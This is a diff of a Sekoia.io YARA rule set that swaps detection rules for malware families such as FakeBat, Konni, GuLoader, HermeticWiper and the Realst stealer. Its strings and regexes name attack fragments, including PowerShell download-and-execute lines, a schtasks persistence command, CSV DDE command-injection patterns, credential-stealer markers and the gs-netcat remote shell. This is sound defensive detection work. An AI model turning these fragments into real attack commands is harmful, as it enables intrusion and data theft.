-		$rtti5 = ".?AVDNameStatusNode@@"
-		$rtti6 = ".?AVpairNode@@"
-		$s1 = "DefWindowProcW1222_test" wide ascii
-		$s2 = "schtasks /create /sc minute /mo 2 /tn" wide ascii
-		$fnv_CreateFile = {CE C9 CA BD}
-		$fnv_GetFileSize = {18 81 ED 44}
-		$fnv_ReadFile = {43 C9 FC 54}
-		$fnv_CloseHandle = {65 00 BA FA}
-		$fnv_WriteFile = {4A C4 07 7F}
-		$fnv_CreateEventA = {E2 DD D2 F9}
-		$fnv_TerminateProcess = {59 EE 4E F8}
-		$fnv_GetCurrentProcess = {45 A8 D8 6D}
-		$fnv_CreateProcessA = { 09 0A 7C 4A}
+		$ = "proxy. It allows multiple gs-netcat clients to (securely) relay"
+		$ = "GS-NETCAT(1)            General Commands Manual          GS-NETCAT(1)"
+		$ = "-T      Use TOR. The gs-netcat tool will connect via TOR to the GSRN."
+		$ = "-D      Daemon & Watchdog mode. Start gs-netcat as a background process"
+		$ = "gs-netcat [-rlgvqwCTSDiu] [-s secret] [-k keyfile] [-L logfile] [-d IP]"
+		$ = "The gs-netcat utility is a re-implementation of netcat."
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of ( $rtti* ) and filesize < 8MB and ( for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "69f400d3ff4679294e63fb8a8ca97dbb" ) or ( all of ( $s* ) and 5 of ( $fnv* ) ) )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xcafebabe ) and filesize > 2MB and filesize < 6MB and 2 of them
 }
-rule SEKOIA_Loader_Fakebat_Powershell_Fingerprint_May24 : FILE
+rule SEKOIA_Tool_Ssf_Strings : FILE
 {
 	meta:
-		description = "Finds FakeBat PowerShell script fingerprinting the infected host."
+		description = "Detects SSF based on strings"
 		author = "Sekoia.io"
-		id = "7efcf9cf-78fe-400e-abe3-6955c394e358"
-		date = "2024-06-21"
+		id = "47fc3df8-a153-4045-a5f0-ed30df662984"
+		date = "2024-05-31"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_fakebat_powershell_fingerprint_may24.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_ssf_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "04e5c888e5f71873c4fa2d732fbd8e40be3edf406300e65e489e1fa378028c5f"
+		logic_hash = "a6fa09a25c90e00466a2b59f8c604084996224c93021ad72ed8705bf05da5d97"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241398,89 +241163,90 @@ rule SEKOIA_Loader_Fakebat_Powershell_Fingerprint_May24 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Get-WmiObject Win32_ComputerSystem" ascii
-		$str02 = "-Class AntiVirusProduct" ascii
-		$str03 = "status = \"start\"" ascii
-		$str04 = " | ConvertTo-Json" ascii
-		$str05 = ".FromXmlString(" ascii
-		$str06 = " = Invoke-RestMethod -Uri " ascii
-		$str07 = ".Exception.Response.StatusCode -eq 'ServiceUnavailable'" ascii
-		$str08 = "Invoke-WebRequest -Uri $url -OutFile " ascii
-		$str09 = "--batch --yes --passphrase-fd" ascii
-		$str10 = "--decrypt --output" ascii
-		$str11 = "Invoke-Expression \"tar --extract --file=" ascii
+		$ = "could NOT read SSF reply"
+		$ = "SSF reply NOT ok {}"
+		$ = "SSF reply OK"
+		$ = "SSF protocol error {}"
+		$ = "SSF reply ok"
+		$ = "SSF version NOT read {}"
+		$ = "SSF version {}"
+		$ = "SSF version NOT supported {}"
 
 	condition:
-		7 of them and filesize < 10KB and true
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 4 of them
 }
-rule SEKOIA_Hacktool_Ntdsdumpex_Strings : FILE
+rule SEKOIA_Technique_Csv_Dde_Exec_Regex : FILE
 {
 	meta:
-		description = "Detects NTDSDumpEx based on strings"
+		description = "Find .csv file exploiting DDE technique"
 		author = "Sekoia.io"
-		id = "9a0fe20a-49e9-4aaf-8f0e-d51800e0a6e0"
-		date = "2022-02-25"
+		id = "71d0e987-51ab-49bc-9d0d-d2f9006af1de"
+		date = "2022-02-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ntdsdumpex_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/technique_csv_dde_exec_regex.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3295816133ca00aeaf3f4967135ed045ed64d20393f482eafbe4e74f0f63aa47"
+		logic_hash = "fd4c64ad094b8ed543cc6990f2e4f341bb38ba0b4d335347e5676475da94dc06"
 		score = 75
-		quality = 80
+		quality = 28
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Example : ntdsdumpex.exe -r" ascii wide
-		$ = "[x]can not open output file %s for write." ascii wide
-		$ = "[+]dump completed in %.3f seconds." ascii wide
-		$ = "[+]total %d entries dumped,%d" ascii wide
-		$ = "[x]can not get PEK!" ascii wide
+		$cmd0 = /=\s*wmic\|/ nocase
+		$cmd1 = /=\s*cmd\|/ nocase
+		$cmd2 = /=\s*wscript\|/ nocase
+		$cmd3 = /=\s*cscript\|/ nocase
+		$cmd4 = /=\s*powershell\|/ nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
+		any of ( $cmd* ) and filesize < 20000
 }
-
-rule SEKOIA_Wiper_Hermeticwiper_Variants
+rule SEKOIA_Apt_Konni_Check_Bat : FILE
 {
 	meta:
-		description = "Matches HermeticWiper and possible variants"
+		description = "Script used to performs check before executing Konni"
 		author = "Sekoia.io"
-		id = "102ecf15-167e-49e4-932c-6334e3cdcc69"
-		date = "2022-02-24"
+		id = "f05e6ba2-c128-4c17-8f74-f7640103c859"
+		date = "2023-11-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_hermeticwiper_variants.yar#L3-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_konni_check_bat.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d0c358517b0a6334d430d3bd75d6c58243ce84e0f90afe48a5069a1e1954119c"
+		logic_hash = "13a9dd6978985eb17960794c6de2ee2e6411e6afeb705ff95ced72bc0efb5d8c"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "SeLoadDriverPrivilege" wide
-		$ = "\\\\.\\PhysicalDrive" wide
-		$ = "::$INDEX_ALLOCATION" wide
-		$ = "CrashDumpEnabled" wide
+		$ = ":64BIT"
+		$ = ":32BIT"
+		$ = ":INSTALL"
+		$ = ":EXIT"
+		$ = "netpp.dll"
+		$ = "wpns.dll"
+		$ = "netpp64.dll"
+		$ = "wpns64.dll"
+		$ = "rundll32"
 
 	condition:
-		2 of them and pe.characteristics and pe.number_of_signatures == 1 and pe.number_of_resources > 2 and for 2 i in ( 0 .. pe.number_of_resources - 1 ) : ( uint32be( pe.resources [ i ] . offset + 15 ) == 0x4D5A9000 and uint16be( pe.resources [ i ] . offset ) == 0x535A )
+		filesize < 1MB and 7 of them
 }
-rule SEKOIA_Guloader_Unpacker : FILE
+rule SEKOIA_Dropper_Win_Konni_Cab : FILE
 {
 	meta:
-		description = "GuLoader Unpacker"
+		description = "Detect the CAB files used to drop the KONNI malware"
 		author = "Sekoia.io"
-		id = "dee4cad4-e3b4-4a12-860b-ff750b119fa8"
-		date = "2024-02-07"
+		id = "87a209d5-667a-4a81-837a-660ab98c33c8"
+		date = "2023-09-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_unpacker.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dropper_win_konni_cab.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6be9d7fa829480466aef2a7e78a7dadfac92f7774ab3374254305040c105496f"
+		logic_hash = "b49bb875d5ddd4b815da5bd184ec7f1d23cfb7ad316760c9a9876607245d0a95"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241488,25 +241254,26 @@ rule SEKOIA_Guloader_Unpacker : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$p1 = "([Parameter(Position = 0)] [Type[]] $" base64
-		$p2 = "+=2){" base64
-		$p3 = "}else {" base64
+		$magic = "MSCF"
+		$file2 = "check.bat"
+		$file3 = "wpnprv64.dll"
+		$file4 = "wpnprv32.dll"
 
 	condition:
-		$p1 in ( filesize -30000 .. filesize ) and $p2 in ( filesize -30000 .. filesize ) and $p3 in ( filesize -30000 .. filesize ) and filesize > 300KB
+		$magic at 0 and all of ( $file* )
 }
-rule SEKOIA_Apt_Gamaredon_Gammaload_Malicioushta : FILE
+rule SEKOIA_Apt_Sandworm_Orcshred_Apr2022 : FILE
 {
 	meta:
-		description = "Detects Gamaredon's GammaLoad HTA"
+		description = "Detects the ORCSHRED script"
 		author = "Sekoia.io"
-		id = "e5e502db-7f37-40f2-9ba3-81e158e767db"
-		date = "2022-08-01"
+		id = "1a88800c-29e1-4e2c-8374-f5a93dd9fd91"
+		date = "2022-04-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_gammaload_malicioushta.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_orcshred_apr2022.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e41ce63e7c6df2edb548ddc57d51af914dab9200e37eb12463169d587205aa7a"
+		logic_hash = "de38cf43fa5cc756c26ae241f2e60636c2aabbe4254fdeca2340c62873498de7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241514,66 +241281,53 @@ rule SEKOIA_Apt_Gamaredon_Gammaload_Malicioushta : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "platform = window.navigator?.userAgentData?.platform" ascii fullword
-		$s2 = "'Win32', 'Win64', 'Windows', 'WinCE'" ascii
-		$s3 = "dcreate.download ="
-		$s4 = "dcreate.href = 'data:application/x-rar-compressed;base64"
-		$s5 = "= \"UmFyI"
+		$ = "find /etc -name os-release >"
+		$ = "/bin/bash /var/"
+		$ = "crontab -l >"
+		$ = ".sh & disown"
 
 	condition:
-		uint32be( 0 ) == 0x3c68746d and filesize < 400KB and filesize > 50KB and 4 of them
+		3 of them and filesize < 2KB
 }
-rule SEKOIA_Infostealer_Mac_Realst : FILE
+rule SEKOIA_Guloader_Lnk_File : FILE
 {
 	meta:
-		description = "Finds Realst Stealer samples based on specific strings"
+		description = "LNK file delivering Guloader"
 		author = "Sekoia.io"
-		id = "16a89317-c92d-4e13-94d3-a85a915f52e5"
-		date = "2023-09-11"
+		id = "ecc07753-0910-445b-bf84-911b17195894"
+		date = "2024-02-07"
 		modified = "2024-12-19"
-		reference = "https://iamdeadlyz.gitbook.io/malware-research/july-2023/fake-blockchain-games-deliver-redline-stealer-and-realst-stealer-a-new-macos-infostealer-malware#realst-stealer-macos"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_mac_realst.yar#L1-L32"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_lnk_file.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "72e694e5c32cbaeb7dff7913fde671619e2c8d892e552546dd1682e38f6804c5"
+		logic_hash = "d69038a8b26c7fc7ba7b0968c7c91b589b25512dcf7e3ad5ee56453a4654a1ab"
 		score = 75
-		quality = 30
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str00 = "realst@" ascii
-		$str01 = "IP:" ascii
-		$str02 = "OS:" ascii
-		$str03 = "PC PASSWORD:" ascii
-		$str04 = "Cookies:" ascii
-		$str05 = "Wallets:" ascii
-		$str06 = "Apps:" ascii
-		$str07 = "USERNAME: ]" ascii
-		$str08 = "FILENAME:" ascii
-		$str09 = "multipart/form-data; boundary=" ascii
-		$str10 = "src/browsers/firefox/modules/decryptors.rs" ascii
-		$str11 = "{\"event_id\":\"" ascii
-		$str12 = "..browsers..firefox..modules..data_stealers.." ascii
-		$str13 = "..browsers..chromium..modules..key_stealers.." ascii
-		$str14 = "..browsers..firefox..modules..decryptors.." ascii
-		$str15 = "url: , login: , password:" ascii
+		$s1 = "$PSHOME" wide
+		$s2 = "&(${" wide
+		$s3 = "}::ToString(" wide
+		$s4 = "$([TYPE]${" wide
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and 13 of ( $str* )
+		uint32be( 0 ) == 0x4c000000 and all of them
 }
-rule SEKOIA_Apt_Apt41_Javascript_Dropper : FILE
+rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Smtp : FILE
 {
 	meta:
-		description = "Detects Earth Lusca JS dropper"
+		description = "Detects SUGARDUMP SMTP version"
 		author = "Sekoia.io"
-		id = "fde70806-af50-4706-9daf-d39ad0564fc7"
-		date = "2024-02-26"
+		id = "bf028ebc-bfaa-45b3-9a3f-8949a5efbb73"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt41_javascript_dropper.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sugardump_credentials_stealer_smtp.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3e34af7141e41044c3d3e099e8b8deafc7441ea47ccbd8af7ffe686f10bb18a2"
+		logic_hash = "1f423f38ff323e67667e35af5603e608cba6eaf8d98633467b0292c5f81c8d1c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241581,139 +241335,105 @@ rule SEKOIA_Apt_Apt41_Javascript_Dropper : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "eval(function(p, a, c, k, e, r) {"
-		$s2 = "|4d53"
-		$s3 = "ActiveXObject"
-		$x1 = " -F:* %1%"
-		$x2 = "&I /r c:\\"
-		$x3 = "ActiveXObject"
+		$ = "<<<<<<<< ------ Passwords Total: {0} --------- >>>>>>>>" wide
+		$ = "Url = {0} , Count = {1}" wide
+		$ = "smtp." wide
+		$ = "encrypted_key\":\"(.*?)\"" wide
 
 	condition:
-		filesize < 2MB and ( all of ( $s* ) or all of ( $x* ) )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_37_Chinotto : FILE
+rule SEKOIA_Apt_Stripedfly : FILE
 {
 	meta:
-		description = "Detects obfuscation and string of APT37 stealer"
+		description = "Detects string relative to Stripedfly malware"
 		author = "Sekoia.io"
-		id = "eff8fd11-dc7a-4011-b083-181d0cca8790"
-		date = "2023-02-27"
+		id = "81968d34-3247-4965-ba44-55747370c90e"
+		date = "2023-11-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_37_chinotto.yar#L1-L50"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_stripedfly.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a721f102b4c9568379649f8004fa4eb460240145ab829d8ce3740dafb52d13c8"
+		logic_hash = "ded64ae30cf994162d4af649a34eadd4b8619cbced4392a6684129f8cf906136"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "feab7940559392bbf38f29267509340569160e0a3b257fd86e5c65ae087ea014"
-		hash2 = "c9d2c8b6011a53e68e4a6c6e51142cef3348951d0b379e49b1a65a1891538df5"
-		hash3 = "2f5be3773e7e3a2f6806cdef154adfabc454c0e57a49e437c5889ce09b739302"
-		hash4 = "5bf170c95ca0e2079653d694f783b5bcd38f274ea875f67f0b60db4ac552a66c"
-		hash5 = "6fad04c836bc923f12ebaec8d8fb0c7091b044bf6f5c97e36d7bf46b8494f978"
-		hash6 = "64fe964f342acca6d85d247c4f67503e4222a58dfc5c644dedc2006a4b356d39"
-		hash7 = "6e216b265ea391f71f2a609df995f36b9ba8b17c8859f6d8e4ce4a076d351efd"
-		hash8 = "70dcc03cde3dd5c5ec6a6a240190cfb51667aaba9c867e20281e8dfc43afa891"
-		hash9 = "5053390bde150b771f8efe344b692c6c5718ba9203a4b23f5323af1ee9060ff2"
-		hash10 = "089e4dfd8b25afe596eff05baae86156a4e3243c84faa15416cff31a5120e107"
-		hash11 = "37e096338a78cb06d6236cb5a04cf125f191871ded3c9421f08a37890a095eb8"
-		hash12 = "b90a2b0249407b271a5d849fe82cbf4e9a31c2c6259caf515c9be3897e327414"
-		hash13 = "8f4751ed22619b04009c4b85ec45c8140b570835ca4c638c9e6019e7b7eb66c7"
 
 	strings:
-		$chunk_1 = {
-        C7 85 ?? ?? ?? ?? ?? ?? ?? 00
-        C7 85 ?? ?? ?? ?? ?? ?? ?? 00
-        33 C0
-        EB 03
-        8D 49 00
-        8B 8C 85 ?? ?? ?? ??
-        3B 8C 85 ?? ?? ?? ??
-        }
-		$chunk_2 = {
-        C7 84 24 ?? ?? ?? ?? ?? ?? 0? 00
-        C7 84 24 ?? ?? ?? ?? ?? ?? 0? 00
-        33 C0
-        EB 0D
-        8D A4 24 00 00 00 00
-        8D 9B 00 00 00 00
-        8B 8C 84 ?? ?? ?? ??
-        3B 8C 84 ?? ?? ?? ??
-        }
-		$movs_zip_dir_start = { C7 45 ?? 5A 69 70 20 C7 45 ?? 44 69 72 20 C7 45 ?? 53 74 61 72  C7 45 ?? 74 20 2D 20}
+		$s1 = "{\"id\":%d,\"jsonrpc\":\"2.0\",\"method\":\"%s\",\"params\":%s}"
+		$s2 = "{\"login\":\"%s\",\"pass\":\"%s\",\"agent\":\"\"}"
+		$s3 = "(tcp|ssl)://([A-Za-z0-9\\.\\-]+):([0-9]+)"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and ( $chunk_1 or $chunk_2 ) and $movs_zip_dir_start
+		filesize < 3MB and 2 of them
 }
-rule SEKOIA_Apt_Tealkurma_Snappytcp_Strings : FILE
+rule SEKOIA_Spyware_And_Bahamut
 {
 	meta:
-		description = "Detects TealKurma SnappyTCP shell script"
+		description = "Detect Bahamut's spyware based on common information gathering function names"
 		author = "Sekoia.io"
-		id = "6bbee6d6-f490-4550-bd61-a643f93a8788"
-		date = "2023-12-08"
+		id = "d416997e-baf1-412c-bf39-905a6e19b65e"
+		date = "2022-11-23"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_tealkurma_snappytcp_strings.yar#L1-L18"
+		reference = "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/spyware_and_bahamut.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b91adef3332850d952cace104fc05e1b09e6175a27ae991905defc46de608e88"
+		logic_hash = "5f44c938fed9b32eaf183be979a67e0c7fde409e72875359105ad7ffb393893d"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "c51dc2132c830c560aaeae4bf48e5f0d28c84b36d27840b5c2ba170d87f4afa5"
+		hash2 = "d7e2cf642b236dba9ba0cbe5a9dc28baf22477973d5ce163e21ec40f5f26e078"
 
 	strings:
-		$s1 = "#!/bin/bash" ascii
-		$s2 = "2>&1>/dev/null&" ascii
-		$s3 = "PATH=$PATH:$PWD;" ascii
+		$ = "FbDao"
+		$ = "SignalDao"
+		$ = "conionDao"
 
 	condition:
-		$s1 at 0 and $s2 at filesize -16 and $s3 and filesize < 300
+		all of them
 }
-rule SEKOIA_Clwiper_Strings : FILE
+rule SEKOIA_Loader_Win_Purecrypter : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detect the PureCrypter loader"
 		author = "Sekoia.io"
-		id = "91e531e2-8548-460f-88a8-cc09abb901e0"
-		date = "2022-09-15"
+		id = "500b4d9e-55f8-41d1-ad4f-d587bbeb4507"
+		date = "2022-09-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/clwiper_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_purecrypter.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b6bcd7e20b07ab8a9a54672f60a8ffe6d6bf787630f01b9dcefd1cbc78297050"
+		logic_hash = "5d0d733a4f8447d2d51656a20640fc9482581e19ba1d53fed7d98e85bb748763"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$w1 = "missing args"
-		$w2 = "wp starts"
-		$w3 = "Total Bytez : %lld"
-		$w4 = "percent is %f spent time is %.2fs"
-		$d1 = "\\\\?\\RawDisk3"
-		$d2 = "B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D"
+		$hex01 = /http:\/\/[^\s]{5,90}_[A-Z][a-z]{7}\.(bmp|jpg|png)/ wide
+		$hex02 = "WrapNonExceptionThrows" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( 3 of ( $w* ) or all of ( $d* ) )
+		uint16( 0 ) == 0x5A4D and ( $hex02 in ( @hex01 .. @hex01 + 1000 ) or $hex01 in ( @hex02 .. @hex02 + 1000 ) )
 }
-rule SEKOIA_Launcher_Win_Stealthmutant_Bat_Launcher : FILE
+rule SEKOIA_Implant_Win_Pingpull : FILE
 {
 	meta:
-		description = "StealthMutant/StealthVector bat launcher"
+		description = "Detect the PingPull malware used by GALLUM in 2022"
 		author = "Sekoia.io"
-		id = "7452291f-2244-469e-bb7c-5eff1ca17aa2"
-		date = "2021-08-26"
+		id = "521615d4-912b-4581-b5a9-a8b158ac9496"
+		date = "2022-06-13"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/launcher_win_stealthmutant_bat_launcher.yar#L1-L26"
+		reference = "https://unit42.paloaltonetworks.com/pingpull-gallium/#Protections-and-Mitigations"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_pingpull.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "06ae4bc3ed938738dfca10c182a6a2363aa6aa70e730aefd41f6fe73c675785d"
+		logic_hash = "778d429e4c6d7575ddeea5144f9554f2b6ca46175d4202d338bef01dc9668b97"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241721,60 +241441,57 @@ rule SEKOIA_Launcher_Win_Stealthmutant_Bat_Launcher : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "set \"WORK_DIR=" ascii
-		$s2 = "set \"DLL_NAME=" ascii
-		$s3 = "set \"SERVICE_NAME=" ascii
-		$s4 = "set \"DISPLAY_NAME=" ascii
-		$s5 = "set \"DESCRIPTION=" ascii
-		$start = "@echo off" ascii
-		$end = "net start \"%SERVICE_NAME%\"" ascii
+		$ = "PROJECT_%s_%s_%08X"
 
 	condition:
-		uint16( 0 ) != 0x5A4D and all of ( $s* ) and filesize < 2KB and $start at 0 and $end in ( filesize -30 .. filesize )
+		uint16( 0 ) == 0x5A4D and all of them
 }
 
-rule SEKOIA_Apt_Sofacy_Graphitemalware_Generic : FILE
+rule SEKOIA_Apt_Apt28_Susp_Graphite_Downloader : FILE
 {
 	meta:
-		description = "Detects APT28 graphite malware based on strings"
+		description = "Matches the routine which decrypts the RSA key blob in the Graphite downloader"
 		author = "Sekoia.io"
-		id = "6b51cfa3-4a7d-4c2a-9fd9-f129b8a18466"
-		date = "2022-09-27"
+		id = "9c9da5fe-ffd6-4c45-8ce1-9a6cf4fa2fda"
+		date = "2022-01-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sofacy_graphitemalware_generic.yar#L3-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_susp_graphite_downloader.yar#L3-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f4c994c36768bae6d6e3b5aeefb634e485ab7b483a693781f29d5ff44c71996f"
-		score = 75
+		logic_hash = "ca5aa7ea995aca9003fd98da2fba7bbec1e049d979a6b05e07b80876bab5a1c9"
+		score = 65
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Microsoft Enhanced RSA and AES Cryptographic Provider" wide
-		$ = "Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)" wide
-		$ = "%s %04d sp%1d.%1d %s"
-		$ = "%s%c%s%c%s"
-		$ = "InternetReadFile"
-		$ = "ObtainUserAgentString"
-		$ = "CryptImportKey"
+		$gen = { 33 D2
+        8B C1
+        6A ??
+        5E
+        F7 F6
+        8A 82 ?? ?? ?? ??
+        30 81 ?? ?? ?? ??
+        41
+        81 F9 94 04 00 00
+        72 E2 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 100KB and ( all of them or pe.imphash ( ) == "c56c322548250651361aef7dacf93eaf" )
+		uint16be( 0 ) == 0x4d5a and $gen and pe.number_of_exports == 1
 }
-rule SEKOIA_Kimsuky_Konni_Dll : FILE
+rule SEKOIA_Malware_Win_Passlib : FILE
 {
 	meta:
-		description = "Rule based on structure offset and file extension"
+		description = "Detect the Passlib malware"
 		author = "Sekoia.io"
-		id = "6a20c492-e932-41bd-ac4a-01d35bfb0c49"
-		date = "2022-09-12"
+		id = "609999e2-a644-4bf3-bce2-b0e1b0e7094b"
+		date = "2022-07-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/kimsuky_konni_dll.yar#L1-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_win_passlib.yar#L1-L32"
